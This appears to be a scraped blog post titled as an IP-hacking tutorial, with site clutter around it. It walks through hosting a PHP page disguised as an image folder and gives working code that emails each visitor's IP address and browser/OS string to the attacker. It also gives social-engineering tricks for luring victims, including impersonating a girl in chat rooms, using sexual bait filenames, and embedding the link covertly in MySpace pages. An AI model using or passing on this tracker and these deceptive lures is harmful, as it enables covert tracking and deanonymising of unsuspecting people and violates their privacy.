gravatar

how to hack IP address tips & tricks Hacks /change 2012 -2013

hack IP address tips & tricks:-

First off I am just going to explain what I did to find out what my victim's IP address is and what browser and OS they are running.

This is going to require for you to send them a link to a site or for them to go to your site. There are other ways you can do it because you guys are smart and will think of it yourselves.

Step 1:

Get a free hosting account::

My favorite is http://x10hosting.com/ because they use CPanel and give many scripting capabilities all for free.

Step 2:

Once you have a hosting account create some folders in your /www directory called
--> /www/me.jpg me.jpg is a directory and yes you can have periods in directory names
--> /www/myaunt.jpg
--> /www/mydog.jpg or whatever is going to help your social engineering skills to get the other person to be interested
One that always work in chat rooms while you are pretending to be a girl is
--> /www/britneyspears_spread_eagle.jpg hahaha

Step 3:

Now that you created your directories find some pictures to correspond them and store them in
--> /www/images

Step 4:

now we create a php file called index.php and put them in our ***.jpg directories and then we add the following code to them

CODE


QUOTE
$remote_addr = "$_SERVER[REMOTE_ADDR]";
$system_info = "$_SERVER[HTTP_USER_AGENT]"; // this is useful to find out OS and browser
$toaddress = "youremail@gmail.com"; // enter your e-mail address here!
$subject = "IP tracker"; // This will be subject of the e-mail
$message = "The IP is $remote_addr \n $system_info"; // The message in the mail with ip and OS
$fromname = "G00f3y"; // The name of the sender
$fromaddress = "3v1l@hell.com"; // The sender’s e-mail
$headers = "MIME-Version: 1.0\n";
$headers .= "Content-type: text/plain; charset=iso-8859-1\n";
$headers .= "X-Priority: 3\n";
$headers .= "X-MSMail-Priority: Normal\n";
$headers .= "X-Mailer: php\n";
$headers .= "From: \"".$fromname."\" <".$fromaddress.">\n";
mail($toaddress, $subject, $message, $headers);
?>


// this is the picture the victim sees




Some of this code came from another member's site on this forum. The code he used did not work so I modified it and got it working and added some more things to it. I think it was Profit62 or something liek that.

Step 5:

Now you go to a chatroom or myspace or where ever and social engineer someone to look at a picture that you have and their information will be sent to the e-mail address you have specified.

Another thing you can do is get a myspace account and add your link into a

CODE




and it will load while the user goes to your site and you get their info

More Full Apk Apps



Internet blogsOnline Marketing


Subscribe Us:-

Enter your email address below


Privacy guaranteed. We'll never share your info.

Archive

My Zimbio